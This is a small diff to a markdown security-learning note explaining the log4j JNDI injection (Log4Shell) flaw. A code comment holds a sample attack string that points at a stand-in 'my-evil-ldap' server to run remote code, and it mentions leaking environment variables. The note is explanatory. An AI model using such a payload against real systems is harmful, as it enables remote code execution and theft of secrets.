hemantksingh/messup-learn/Security/Web Security/Web Application Security.md

     logger.info("User {} searched for {}", user.getId(), searchTextInput);

     // if attacker sets up a remote JNDI server with malicious code and passes that as the search input,
-    // it will result in the your affected application using log4j running this remote malicious code searchTextInput = "$jndi:ldap://my-evil-ldap/maliciousobject}"
+    // it will result in the affected application that is using log4j running this remote malicious code searchTextInput = "$jndi:ldap://my-evil-ldap/maliciousobject}"

     // attacker can also lookup application environment variables and send them over to the remote JNDI server